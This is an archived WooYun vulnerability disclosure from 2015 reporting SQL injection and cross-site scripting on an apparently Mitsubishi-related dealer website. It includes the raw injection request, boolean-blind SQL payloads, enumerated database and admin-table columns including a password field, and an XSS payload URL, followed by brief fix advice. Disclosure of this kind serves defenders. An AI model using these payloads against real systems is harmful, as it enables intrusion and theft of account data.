乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-05: 细节向核心白帽子及相关领域专家公开 2015-10-15: 细节向普通白帽子公开 2015-10-25: 细节向实习白帽子公开 2015-11-09: 细节向公众公开
SQL+XSS
1、SQL注入2、XSS跨站1、SQL注入1.1 注入点
GET /Ajax/CommonHandler.ashx?method=DealerInfo&CityCode=4401&Where=%27+OR+%27ns%27%3d%27ns HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept: application/json, text/javascript, */*; q=0.01Referer: http://**.**.**.**/BuyTools/BuyChooses/DealerSearch?tow=X-Requested-With: XMLHttpRequestAccept-Language: en-us,en;q=0.5X-Scanner: NetsparkerHost: **.**.**.**Cookie: ASP.NET_SessionId=tkfjxlpktswxl3cbbnhjqln3; SC_ANALYTICS_GLOBAL_COOKIE=f4b1236f12cd4844a44d5be7e0a051d7; SC_ANALYTICS_SESSION_COOKIE=E7D9D5BAF68E4D18A25EC94839FA5F00|0|tkfjxlpktswxl3cbbnhjqln3; MITSUBISHI_COOKIE={"Car":"{\"1100000501\":6}"}; \"1100000323\":1}"}=; NewsId=dbc2158a-090c-490f-9b66-346d574e3947|fa7168aa-60b3-4b10-8ea7-c49b186ee3cb|226c662d-6db8-469e-b7ce-f1eee1d6f26a|f351b356-d753-46a3-8d2e-f179fde37491|c3dcd749-e362-4add-beee-650047eaf8ee|5fe1f30c-c954-428d-9d2b-32f5e740267a|73c06fb6-2a84-4562-8341-35c5b2368cc8|2f97806f-5b19-4f98-bf38-0bfece5d539d|cf816137-b05c-4ed1-b28a-02b0dbd2587f|08c6716e-93e5-486e-868b-c598a08634e1|da49e78f-5fc9-4eb3-beaa-b452dc89cda7|67ca10f9-9e2d-48cf-a52f-5faf7aa6d80b|283a20e9-89dd-485c-b40d-eb177ca1700f; website#sc_mode=edit; shell#sc_mode=editAccept-Encoding: gzip, deflate
1.2涉及数据库
Place: GETParameter: Where Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&Where=3%' AND 5562=5562 AND '%'='Place: GETParameter: CityCode Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' AND 9587=9587 AND 'kCYY'='kCYY&Where=3---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: Where, type: Single quoted string (default)[1] place: GET, parameter: CityCode, type: Single quoted string[q] Quit> 1
available databases [10]:[*] GMMC_Extend[*] master[*] Mitsubishi_master[*] Mitsubishi_WeChat[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] temp[*] tempdb
1.3 tables和columns
Database: Mitsubishi_WeChat[13 tables]+------------------------+| dbo.Account || dbo.AdminAccount || dbo.Articles || dbo.AvailableFunctions || dbo.Exception || dbo.Member || dbo.Menus || dbo.Scenes || dbo.UrlInfo || dbo.UserPhones || dbo.[KeyWor s] || dbo.hn || dbo.urlzm |+------------------------+======================Database: Mitsubishi_WeChatTable: dbo.AdminAccount[5 columns]+-----------+----------+| Column | Type |+-----------+----------+| Account | nvarchar || Id | int || JoinTime | datetime || LastLogin | datetime || PassWord | nvarchar |+-----------+----------+
2、XSS
http://**.**.**.**/SearchResult?keywords=<IMG src="/JaVaScRiPt.:alert"("XSS")>
1、SQL注入
1、过滤参数2、还是过滤(特殊字符)
危害等级:中
漏洞Rank:10
确认时间:2015-09-25 17:14
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无